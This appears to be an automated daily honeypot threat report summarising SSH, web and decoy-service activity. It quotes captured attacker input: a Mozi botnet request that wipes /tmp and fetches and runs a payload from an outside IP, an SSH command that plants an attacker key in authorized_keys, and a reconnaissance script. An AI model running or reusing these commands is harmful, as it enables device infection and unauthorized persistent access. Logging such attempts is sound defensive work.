๐Ÿ’€ critical

Daily Threat Report

724 SSH Connections
472 Login Attempts
249 Commands Run
98 SSH Unique IPs
7,895 Protocol Events
94 Protocol IPs
43 Web Hits
15 Web Service IPs
17 Reverse Scans
16 Scan Hits

Top Passwords Tried

  1. 91566946b1d8deb0
  2. aad3f9ba1d6740cc
  3. 8c6976e5b5410415
  4. ab0c16f2769c75b4
  5. 4813494d137e1631

๐ŸŒ WEB HONEYPOT โ€” HoneyAI HTTP

AI-generated fake HTTP responses served to 43 scanner requests from 15 unique IPs (local, offline).

Top Paths Probed

  1. /SDK/webLanguage
  2. /
  3. /goform/set_LimitClient_cfg
  4. /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://110.38.254.189:33444/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
  5. /login

Top User-Agents

  1. Mozilla/5.0
  2. Go-http-client/1.1
  3. Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
  4. Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 SE 2.X MetaSr 1.0
  5. Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0

๐Ÿ’ฅ OPERATION SPINE โ€” Reverse Port Scanning

Active defense back-profiling: HoneyAI executed **17** reverse port-scans against active attacker IPs. Out of these, **16** hosts were found with open services.

Discovered Open Ports on Attackers

๐ŸŒ74.207.228.211 Scanned at 00:24
๐ŸŒ64.62.197.16 Scanned at 04:58
๐ŸŒ64.62.197.2 Scanned at 06:15
๐ŸŒ64.62.197.8 Scanned at 06:15
๐ŸŒ24.144.82.180 Scanned at 06:55
๐ŸŒ64.89.163.153 Scanned at 08:27
๐ŸŒ91.231.89.90 Scanned at 08:43
๐ŸŒ91.230.168.218 Scanned at 08:50
๐ŸŒ64.89.163.138 Scanned at 08:59
๐ŸŒ64.89.163.77 Scanned at 09:28
๐ŸŒ151.243.11.37 Scanned at 09:46
๐ŸŒ204.76.203.15 Scanned at 13:01
๐ŸŒ64.89.163.145 Scanned at 14:51
๐ŸŒ24.144.82.180 Scanned at 15:51
๐ŸŒ64.89.163.89 Scanned at 16:00
๐ŸŒ206.223.236.181 Scanned at 18:51
๐ŸŒ64.23.241.213 Scanned at 19:21
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
โ†’ 179 IPs โ†’ AbuseIPDB  (community confidence scores updated)
โ†’ 179 IPs โ†’ AlienVault OTX  (pulse indicators added)
โ†’ 179 IPs โ†’ Blocklist.de  (auto-ban list updated)
โ†’ 179 IPs โ†’ DShield/SANS  (global threat feed updated)

๐Ÿคฃ ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

๐Ÿ”‘ Hall of Shame โ€” Passwords

91566946b1d8deb0
aad3f9ba1d6740cc
8c6976e5b5410415
ab0c16f2769c75b4
4813494d137e1631

๐Ÿ’ป Commands They Tried

uname -s -m
cd ~ && rm -rf .ssh && mkdir .ssh && echo $_dqssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr$_dq>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
uname -a
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH
uname=$(uname -s -v -n -m 2>/dev/null)
arch=$(uname -m 2>/dev/null)
uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1)
cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c $_dq^processor$_dq /proc/cpuinfo 2>/dev/null) | head -1)
cpu_model=$( (grep -m1 -E $_dqmodel name|Hardware$_dq /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,$_dq$_dq,$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' )
gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50)
cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1)
ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1)
last_output=$(last 2>/dev/null | head -n 10)
echo $_dqUNAME:$uname$_dq
echo $_dqARCH:$arch$_dq
echo $_dqUPTIME:$uptime$_dq
echo $_dqCPUS:$cpus$_dq
echo $_dqCPU_MODEL:$cpu_model$_dq
echo $_dqGPU:$gpu_info$_dq
echo $_dqCAT_HELP:$cat_help$_dq
echo $_dqLS_HELP:$ls_help$_dq
echo $_dqLAST:$last_output$_dq
/bin/./uname -s -v -n -r -m

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 19 de junio de 2026. Recorded 724 SSH connections and 7895 multi-protocol decoy events on HoneyAI, from 192 unique IPs. 179 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (HoneyAI)

The SSH service received 472 login attempts from 98 unique IPs. Attackers executed 249 commands after gaining simulated system access.

Multi-Protocol Decoys (HoneyAI)

Detected 7895 events across services including FTP, Telnet, SMTP, MySQL, Redis, Git, VNC, and RDP from 94 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Service (HoneyAI)

The web service received 43 HTTP requests from real scanners across 15 unique IPs. Each attacker received a fake response generated in real time by the local AI engine (Ollama, no internet connection required).

MCP Agent Trap

The MCP decoy server received 3 requests from 1 unique IPs. Attackers attempted to call internal tools including credential extraction and system command execution.

MSSQL / SNMP Honeypots

The MSSQL decoy received 3 authentication events from 3 IPs. The SNMP trap received 27 queries from 17 IPs probing community strings and OIDs.

Portscan Detection

Detected 0 incoming port scan events from 0 unique IPs.

AI Defense Stats

Blocked 0 prompt injection attempts and 0 identity leak attempts.

Active Defense (Operation Spine)

HoneyAI performed 17 reverse port scans back to active attacker IPs. Out of these, 16 hosts were found running open public services, allowing backfire profiling.

Network IDS (Suricata)

The network intrusion detection system generated 8196 alerts from 664 unique source IPs. Suricata monitors all traffic on the primary network interface using Emerging Threats + AlienVault OTX rulesets.

โ† All Reports ๐Ÿ›ก๏ธ Subscribe to blocklists โ†’